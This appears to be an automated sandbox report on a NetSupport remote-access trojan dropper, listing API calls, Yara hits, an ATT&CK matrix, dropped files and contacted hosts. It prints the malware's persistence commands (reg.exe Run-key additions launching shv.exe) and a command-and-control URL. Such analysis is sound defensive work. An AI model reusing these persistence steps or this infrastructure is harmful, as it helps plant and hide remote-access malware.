Source: shv.exe, 0000000B.00000003.2263461175.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000D.00000003.2349439155.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000E.00000003.2430757165.00000000010C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node	graph_6-80960
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node	graph_6-80330
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node	graph_6-85066
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF70E7B76D8

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,

6_2_11147750

Source: C:\Users\Public\Netstat\shv.exe

6_2_11029590

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7C0D20 GetProcessHeap,

0_2_00007FF70E7C0D20

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF70E7B76D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B3354 SetUnhandledExceptionFilter,	0_2_00007FF70E7B3354
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF70E7B2510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF70E7B3170
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	6_2_11093080
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,	6_2_110310C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_11161D01
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1116DD89
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1E28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6D1E28E1
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	9_2_11093080
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,	9_2_110310C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_11161D01
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_1116DD89

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,

6_2_110F4560

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF70E7AB190

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,

6_2_1111FCA0

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

6_2_1109E190

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

6_2_1109E910

Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Shell_TrayWnd
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Progman

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E79DC70 cpuid

0_2_00007FF70E79DC70

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	0_2_00007FF70E7AA2CC
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_11173A35
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_11173D69
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11173CC6
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoA,	6_2_1116B38E
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_11173933
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_111739DA
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_1117383E
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11173D2D
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_11173C06
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_6D1F1DB6
Source: C:\Users\Public\Netstat\shv.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_6D1FDC56
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoA,	6_2_6D1FDC99
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_6D1F1CC1
Source: C:\Users\Public\Netstat\shv.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	6_2_6D1F0F39
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_6D1F1E5D
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_6D1F1EB8
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	6_2_6D1FDB7C
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	9_2_11173D69
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoA,	9_2_1116B38E
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	9_2_11173933
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	9_2_111739DA
Source: C:\Users\Public\Netstat\shv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_1117383E
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	9_2_11173A35
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	9_2_11173D2D
Source: C:\Users\Public\Netstat\shv.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	9_2_11173C06
Source: C:\Users\Public\Netstat\shv.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	9_2_11173CC6

Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

6_2_110F33F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7B0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF70E7B0754

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,

6_2_1103B160

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

6_2_11174AE9

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E794EB0 GetVersionExW,

0_2_00007FF70E794EB0

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	6_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	6_2_110D8200
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1CA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,	6_2_6D1CA980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,	9_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,	9_2_110D8200

Source: Yara match	File source: 9.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.70030000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.74a90000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.229e94ad820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.6d1c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2431151804.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 4000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\shv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	1 Input Capture	12 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	4 Native API	1 DLL Side-Loading	1 DLL Side-Loading	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	22 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Software Packing	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Windows Service	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	44 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	1 Windows Service	1 Masquerading	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	13 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Modify Registry	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	13 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	39%	ReversingLabs	Win64.Trojan.NetSupport

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Netstat\HTCTL32.DLL	3%	ReversingLabs
C:\Users\Public\Netstat\PCICHEK.DLL	3%	ReversingLabs
C:\Users\Public\Netstat\PCICL32.DLL	12%	ReversingLabs
C:\Users\Public\Netstat\TCCTL32.DLL	3%	ReversingLabs
C:\Users\Public\Netstat\msvcr100.dll	0%	ReversingLabs
C:\Users\Public\Netstat\pcicapi.dll	3%	ReversingLabs
C:\Users\Public\Netstat\remcmdstub.exe	13%	ReversingLabs
C:\Users\Public\Netstat\shv.exe	29%	ReversingLabs	Win32.Trojan.NetSupport

Source	Detection	Scanner	Label	Link
http://45.61.128.74/fakeurl.htm	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geo.netsupportsoftware.com	104.26.0.231	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.61.128.74/fakeurl.htm	true	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.asp	false		high

